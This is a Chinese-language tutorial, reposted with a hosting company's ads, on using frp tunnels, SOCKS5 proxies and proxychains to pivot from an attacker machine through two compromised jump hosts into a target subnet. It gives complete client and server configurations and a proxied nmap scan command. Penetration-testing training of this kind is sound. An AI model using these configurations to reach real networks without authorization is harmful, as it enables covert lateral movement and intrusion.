使用frp隧道穿透多層內網(wǎng)-創(chuàng)新互聯(lián)

內網(wǎng)環(huán)境說明

10.1.200.10  								攻擊機
10.1.200.20/172. 16.200.20		跳板機1
172.16.30/192.168.33.30			跳板機2
192.168.33.66								目標

frpc是frp的客戶端

客戶端一般安裝在被滲透機器上,在不需要雙層內網(wǎng)滲透的情況下只需要上傳frpc
配置文件:
[common] 
server_addr = 192.168.1.20	//frps服務ip
server_port = 7000					//frps服務端口
[socks5] 
type = tcp 
plugin = socks5 
remote_port = 5000					//滲透機或跳板機使用的端口

frps是frp的服務端

frps是frp的服務端單層內網(wǎng)情況下只安裝在滲透機，雙層內網(wǎng)需要安裝在跳板機中。
配置文件:
[common]
bind_port = 7000 //frps的服務端的端口

運行

frpc:	./frpc -c frpc.ini(配置文件)
frps:   ./frps -c frps.ini(配置文件)

配置使用的代理（linux）

leafpad /etc/proxychains.conf
添加socks5 127.0.0.1 5000,這里的5000對應上frpc.ini配置文件中的socks5代理端口
proxychains nmap -Pn -sT -T4 192.168.1.20 代理nmap掃描

雙層內網(wǎng)配置

滲透機
	proxychains.conf配置
	socks5 127.0.0.1 8000			172段
	socks5 127.0.0.1 9000			192段
	10.1.200.10  				本機ip10.1.200.10,代理端口8000 172段 代理端口9000 192段
	frps配置:
	[common]
	bind_port = 7000				//frps服務的端口非代理端口
跳板機1
	10.1.200.20/172. 16.200.20		//雙網(wǎng)卡主機
	frps配置
	[common]
	bind_port = 7000				//frps服務的端口非代理端口
	frpc配置
	[common]
	server_addr = 10.1.200.10
	server_port = 7000

	[socks5_172]
	type = tcp
	plugin = socks5
	remote_port = 8000			//172段sockts5代理端口（滲透機）						

	[socks5_192]
	type = tcp
	local_ip = 127.0.0.1
	local_port = 9999				//跳板機2的sockts5代理端口
	remote_port = 9000			//192段sockts5代理端口（滲透機）
	說明:跳板機1向滲透機代理兩個sockts5端口分別是8000端口和9000端口，8000端口代表172段是跳板機本機能訪問的，
	9000端口是192段跳板機1本來是不能訪問但是獲取了跳板機2的權限配置了代理因此可以相當于轉發(fā)了跳板機2的流量。
跳板機2
	172.16.30/192.168.33.30		//雙網(wǎng)卡主機
	frpc配置
	[common]
	server_addr = 172. 16.200.20
	server_port = 7000

	[socks5_192_172]
	type = tcp
	plugin = socks5
	remote_port = 9999
	說明:跳板機2只需要配置frpc即可,frps的ip地址填寫的是跳板機1的ip并且對應上跳板機1的sockts5代理端口，最終使得滲透機可以訪問目標。

你是否還在尋找穩(wěn)定的海外服務器提供商？創(chuàng)新互聯(lián)www.cdcxhl.cn海外機房具備T級流量清洗系統(tǒng)配攻擊溯源，準確流量調度確保服務器高可用性，企業(yè)級服務器適合批量采購，新人活動首月15元起，快前往官網(wǎng)查看詳情吧

成都創(chuàng)新互聯(lián)成立于2013年，我們提供高端網(wǎng)站建設、成都網(wǎng)站制作公司、成都網(wǎng)站設計、網(wǎng)站定制、成都全網(wǎng)營銷推廣、小程序制作、微信公眾號開發(fā)、網(wǎng)站推廣服務，提供專業(yè)營銷思路、內容策劃、視覺設計、程序開發(fā)來完成項目落地，為成都服務器托管企業(yè)提供源源不斷的流量和訂單咨詢。
新聞名稱：使用frp隧道穿透多層內網(wǎng)-創(chuàng)新互聯(lián)
網(wǎng)站地址：http://www.jiaotiyi.com/article/eijdg.html